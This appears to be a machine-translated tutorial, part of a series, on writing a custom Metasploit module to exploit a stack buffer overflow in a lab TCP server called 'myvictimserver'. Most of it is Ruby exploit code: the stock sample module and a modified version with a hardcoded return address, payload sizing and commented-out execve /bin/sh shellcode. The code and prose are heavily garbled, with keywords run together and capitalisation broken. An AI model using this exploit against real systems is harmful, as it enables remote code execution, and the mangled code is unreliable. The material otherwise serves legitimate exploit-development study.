Overflow attack using Metasploit stacks-4

With a loophole, we can attack. First of all we need to understand the Metasploit exploit module, in particular, can see

Http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

The Metasploit itself is very powerful and does not introduce much here.

First we need to add a exploit module for this vulnerability,

We make changes directly to the sample:

mkdir Exploits[email protected]:~/.msf4/modules# cd exploits[email protected]:mkdir  linux[ Email protected]:cp /pentest/exploits/framework/documentation/samples/modules/exploits/  SAMPLE.RB  myvictim.rb[email protected]:lsmyvictim.rb  myvictimserver.rb  proftp_ SREPLACE.RB

Then view MYVICTIM.RB

###$Id: sample.rb 9212 2010-05-03 17:13:09z Jduck $#####This file was part of the Metasploit Framework and may subject to#Redistribution and commercial restrictions. please see the Metasploit#Framework Web site For more information on licensing and terms of use.#http://metasploit.com/framework/##require'Msf/core'Module MSF#####This exploit sample shows what an exploit module could is written to exploit#a bug in an arbitrary TCP server.####classExploits::sample <Msf::exploit::remote#        #This exploit affects TCP servers, so we use the TCP client mixin.        #include Exploit::remote::tcpdefInitialize (info ={}) Super (Update_info (info,'Name'='Sample Exploit',                        'Description'=%q{This exploit module illustrates what a vulnerability could be exploited incha TCP server that has a parsing bug. },                        'Author'='Skape',                        'Version'='$Revision: 9212 $',                        'References'=                                [                                ],                        'Payload'=                                {                                        'Space'= 1000,                                        'Badchars'="\x00",                                },                        'Targets'=                                [                                        #Target 0:windows All                                        [                                                'Windows Universal',                                                {                                                        'Platform'='win',                                                        'Ret'= 0x41424344                                                }                                        ], ],                        'Defaulttarget'=0)) End#        #The sample exploit just indicates that the remote host was always        #vulnerable.        #        defCheckreturnExploit::checkcode::vulnerable End#        #The exploit method connects to the remote service and sends A ' s        #followed by the fake return address and then the payload.        #        defexploit connect print_status ("sending #{payload.encoded.length} byte payload ...")                #Build the buffer for transmissionBUF ="A"* 1024buf+ = [Target.ret].pack ('V') BUF+=payload.encoded#Send it offsock.put (buf) sock.get handler Endendend

Then we need to add him into the Metasploit, run Reload_all

=[Metasploit v4.0.0-release [core:4.0 api:1.0]
+----=[719 exploits-361 auxiliary-68 Post
+----=[226 payloads-27 encoders-8 Nops
=[svn r13462 updated 1208 days ago (2011.08.01)

Warning:this copy of the Metasploit Framework was last updated 1208 days ago.
We recommend the framework at least every.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

MSF > Reload_all

MSF > Use exploit/linux/my
Use Exploit/linux/mysql/mysql_yassl_getname use Exploit/linux/myvictimserver
Use Exploit/linux/mysql/mysql_yassl_hello
MSF > Use exploit/linux/my

Here is not a list of the modules we just added, stating that the module has a problem, must be modified, modified as follows:

###$Id: myvictimserver.rb 9212 2014-11-03 17:13:09z Jduck $#####This file was part of the Metasploit Framework and may subject to#Redistribution and commercial restrictions. please see the Metasploit#Framework Web site For more information on licensing and terms of use.#http://metasploit.com/framework/##require'Msf/core'#####This exploit sample shows what an exploit module could is written to exploit#a bug in an arbitrary TCP server.####classMetasploit3 <msf::exploit::remote Rank=greatranking#    #This exploit affects TCP servers, so we use the TCP client mixin.    #include Exploit::remote::tcpdefInitialize (info ={}) Super (Update_info (info,'Name'='Myvictimsever',            'Description'=%q{This exploit module illustrates what a vulnerability could be exploitedincha TCP server that has a StackOverflow bug. },            'Author'='Bai',            'Version'='$Revision: 9212 $',            'References'=                [                ],            'Payload'=                {                    'Space'= 116,#                    'Badchars'="\x00",                },            'Targets'=                [                    #Target 0:windows All                    [                        'myvictimsever run on Linux',                        {                            'Platform'='Linux',                            'Ret'= 0xbffff4a4                        }                    ],                ],            'Defaulttarget'=0)) End#    #The sample exploit just indicates that the remote host was always    #vulnerable.    #    defCheckreturnExploit::checkcode::vulnerable End#    #The exploit method connects to the remote service and sends A ' s    #followed by the fake return address and then the payload.    #    defexploit connect print_status ("sending #{payload.encoded.length} byte payload ...")        #Build the buffer for transmissionbuf=""; #buf = "\x90" *        #buf+= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"        #buf+= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"        #buf+= "\x80\xe8\xdc\xff\xff\xff/bin/sh";buf+="\XA4\XF4\XFF\XBF"buf+=payload.encoded buf+ = [].fill (target.ret,0,100). Pack ('v*')        #Send it offsock.put (buf) sock.get handler EndEnd

At this time, we can find this module.

MSF > Use exploit/linux/myuse exploit/linux/mysql/mysql_yassl_getname use  exploit/linux/  Myvictimuse exploit/linux/mysql/mysql_yassl_hello use    exploit/linux/> Use exploit/linux/my

Overflow attack using Metasploit stacks-4